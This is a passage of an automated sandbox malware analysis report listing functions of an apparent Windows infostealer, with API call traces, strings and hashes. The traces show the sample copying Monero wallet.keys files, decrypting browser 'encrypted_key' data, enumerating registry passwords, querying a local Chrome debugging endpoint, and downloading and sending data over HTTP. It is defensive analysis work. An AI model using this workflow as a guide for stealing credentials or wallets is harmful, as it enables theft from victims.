                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00035568
                          • lstrlen.KERNEL32(00000000), ref: 0003557F
                            • Part of subcall function 00038FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00038FE2
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 000355B4
                          • lstrlen.KERNEL32(00000000), ref: 000355D3
                          • lstrlen.KERNEL32(00000000), ref: 000355FE
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 59d274212e211e4c1a7e2d03d42419bf3348d274f8f17d0de2d50d86ed28bafd
                          • Instruction ID: 383d3d42c2cb6000d6a69a3a7b0a83c1b0d3531f89499e4bf9754b1c4a1af9a7
                          • Opcode Fuzzy Hash: 59d274212e211e4c1a7e2d03d42419bf3348d274f8f17d0de2d50d86ed28bafd
                          • Instruction Fuzzy Hash: BA51D770A10108EBCB15FF60DDA6AED777DAF12341F504468E54A6B5A3EB306B48CB62
                          Function 00031520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: b58a2b178db88524a3071527b73e7210a5c02bbb39730e71dcab12c7f25329b5
                          • Instruction ID: f43c58cecc4156e819baa2d7543d235ad609f8a2d0975f05adb2d9fa7273790e
                          • Opcode Fuzzy Hash: b58a2b178db88524a3071527b73e7210a5c02bbb39730e71dcab12c7f25329b5
                          • Instruction Fuzzy Hash: D6C141B5A002199BCB15EF60EC99FEE737DAF58304F0045D9F50AA7242DB70AA85CF91
                          Function 000344D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00038F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00038F9B
                          • lstrcat.KERNEL32(?,00000000), ref: 0003453C
                          • lstrcat.KERNEL32(?,00FDE470), ref: 0003455B
                          • lstrcat.KERNEL32(?,?), ref: 0003456F
                          • lstrcat.KERNEL32(?,00FDCE88), ref: 00034583
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 00038F20: GetFileAttributesA.KERNEL32(00000000,?,00021B94,?,?,0004577C,?,?,00040E22), ref: 00038F2F
                            • Part of subcall function 0002A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0002A489
                            • Part of subcall function 0002A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                            • Part of subcall function 0002A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                            • Part of subcall function 0002A110: LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                            • Part of subcall function 0002A110: ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                            • Part of subcall function 0002A110: LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                            • Part of subcall function 0002A110: CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                            • Part of subcall function 00039550: GlobalAlloc.KERNEL32(00000000,0003462D,0003462D), ref: 00039563
                          • StrStrA.SHLWAPI(?,00FDE5C0), ref: 00034643
                          • GlobalFree.KERNEL32(?), ref: 00034762
                            • Part of subcall function 0002A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A23F
                            • Part of subcall function 0002A210: LocalAlloc.KERNEL32(00000040,?,?,?,00024F3E,00000000,?), ref: 0002A251
                            • Part of subcall function 0002A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A27A
                            • Part of subcall function 0002A210: LocalFree.KERNEL32(?,?,?,?,00024F3E,00000000,?), ref: 0002A28F
                          • lstrcat.KERNEL32(?,00000000), ref: 000346F3
                          • StrCmpCA.SHLWAPI(?,000408D2), ref: 00034710
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00034722
                          • lstrcat.KERNEL32(00000000,?), ref: 00034735
                          • lstrcat.KERNEL32(00000000,00040FA0), ref: 00034744
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 2d01669de315669ad33e70bda4ec08994dd83356f6eab3998e1e201e4b1c5bbf
                          • Instruction ID: 38afb34c7c19ae7ce0d5ec085f4c859f12efb639f4302145922d27b7935e32dc
                          • Opcode Fuzzy Hash: 2d01669de315669ad33e70bda4ec08994dd83356f6eab3998e1e201e4b1c5bbf
                          • Instruction Fuzzy Hash: 947168B6A00218ABDB15EBA0ED59FEE777DAF89300F004598F605A7142EB34EB54CF51
                          Function 00021310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 000212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000212B4
                            • Part of subcall function 000212A0: RtlAllocateHeap.NTDLL(00000000), ref: 000212BB
                            • Part of subcall function 000212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000212D7
                            • Part of subcall function 000212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000212F5
                            • Part of subcall function 000212A0: RegCloseKey.ADVAPI32(?), ref: 000212FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0002134F
                          • lstrlen.KERNEL32(?), ref: 0002135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00021377
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00021465
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 0002A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                            • Part of subcall function 0002A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                            • Part of subcall function 0002A110: LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                            • Part of subcall function 0002A110: ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                            • Part of subcall function 0002A110: LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                            • Part of subcall function 0002A110: CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                          • DeleteFileA.KERNEL32(00000000), ref: 000214EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 8e5ca1e2f02c6292b51d763a5763d991d3f01cf02b1b255c3ba8d54de4b53fc0
                          • Instruction ID: 2136ca250deb827303e6c361d7d6ea5bf92520bd89e68effc605b6b69d691a7a
                          • Opcode Fuzzy Hash: 8e5ca1e2f02c6292b51d763a5763d991d3f01cf02b1b255c3ba8d54de4b53fc0
                          • Instruction Fuzzy Hash: E35144B2E501189BCB15EB60DDA6FED733C9F55300F4045E8B64A66093EF306B89CB66
                          Function 00029A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenA.WININET(00040AF6,00000001,00000000,00000000,00000000), ref: 00029A6A
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00029AAB
                          • InternetCloseHandle.WININET(00000000), ref: 00029AC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$Open$CloseHandle
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 3289985339-2144369209
                          • Opcode ID: 738a5b730a766c50467f4ae6f02093c2ad8639f32dd564c7d93a892fb594bcbe
                          • Instruction ID: 4dafff2b7597b878e1975bbca25e13268fd729295f5e544f241150e092633af4
                          • Opcode Fuzzy Hash: 738a5b730a766c50467f4ae6f02093c2ad8639f32dd564c7d93a892fb594bcbe
                          • Instruction Fuzzy Hash: FF414F75A10218EFCB14EF90ED95FED77B8BB48740F1041A5F609AB191CBB0AE84CB54
                          Function 00027630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00027330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0002739A
                            • Part of subcall function 00027330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00027411
                            • Part of subcall function 00027330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0002746D
                            • Part of subcall function 00027330: GetProcessHeap.KERNEL32(00000000,?), ref: 000274B2
                            • Part of subcall function 00027330: HeapFree.KERNEL32(00000000), ref: 000274B9
                          • lstrcat.KERNEL32(00000000,0004192C), ref: 00027666
                          • lstrcat.KERNEL32(00000000,00000000), ref: 000276A8
                          • lstrcat.KERNEL32(00000000, : ), ref: 000276BA
                          • lstrcat.KERNEL32(00000000,00000000), ref: 000276EF
                          • lstrcat.KERNEL32(00000000,00041934), ref: 00027700
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00027733
                          • lstrcat.KERNEL32(00000000,00041938), ref: 0002774D
                          • task.LIBCPMTD ref: 0002775B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: fe3c17951d505470add530842ecde0ad75f7fdc6127691146902a2dbb5f40e93
                          • Instruction ID: 643a17b670fabbe3e734398c18ed950d25da94d513ba61e674226bc20fae236e
                          • Opcode Fuzzy Hash: fe3c17951d505470add530842ecde0ad75f7fdc6127691146902a2dbb5f40e93
                          • Instruction Fuzzy Hash: 21318175904118EBDB08EBE0FC9ADFE7778AF48350B104128F506672A1CE34A996CF50
                          Function 00038290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00FDE1B8,00000000,?,00040E14,00000000,?,00000000), ref: 000382C0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000382C7
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 000382E8
                          • __aulldiv.LIBCMT ref: 00038302
                          • __aulldiv.LIBCMT ref: 00038310
                          • wsprintfA.USER32 ref: 0003833C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: cc2d18c33fadf79004cc564f9d9727d35b2bbd879f3e54960c4c19b95251c937
                          • Instruction ID: 59bc99e3ddf7ecf07760b55915210a049afe9d77a3adf21e5f74a6fe5cc2d497
                          • Opcode Fuzzy Hash: cc2d18c33fadf79004cc564f9d9727d35b2bbd879f3e54960c4c19b95251c937
                          • Instruction Fuzzy Hash: 9A21F4B1E44309ABDB10DFD4EC4AFAEBBB8EB44B14F104559F615BB280D77869008BA5
                          Function 000260F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 00024800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00024889
                            • Part of subcall function 00024800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00024899
                          • InternetOpenA.WININET(00040DFB,00000001,00000000,00000000,00000000), ref: 0002615F
                          • StrCmpCA.SHLWAPI(?,00FDEA68), ref: 00026197
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 000261DF
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00026203
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 0002622C
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0002625A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00026299
                          • InternetCloseHandle.WININET(?), ref: 000262A3
                          • InternetCloseHandle.WININET(00000000), ref: 000262B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: c94e1e12d891cde0401fc2fad61caab3d8867ea4d04810459a9117d1c67eb733
                          • Instruction ID: 8e5662e90efb007b2277d5a75c1f0d8b686dd335fe298a4e76c61eb0b1500caa
                          • Opcode Fuzzy Hash: c94e1e12d891cde0401fc2fad61caab3d8867ea4d04810459a9117d1c67eb733
                          • Instruction Fuzzy Hash: F95176B1A00218EBDF20DF90EC59FEEB779AB44301F1040A8F609A71C1DB756A89CF95
                          Function 000A012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 000A024D
                          • ___TypeMatch.LIBVCRUNTIME ref: 000A035B
                          • CatchIt.LIBVCRUNTIME ref: 000A03AC
                          • CallUnexpected.LIBVCRUNTIME ref: 000A04C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
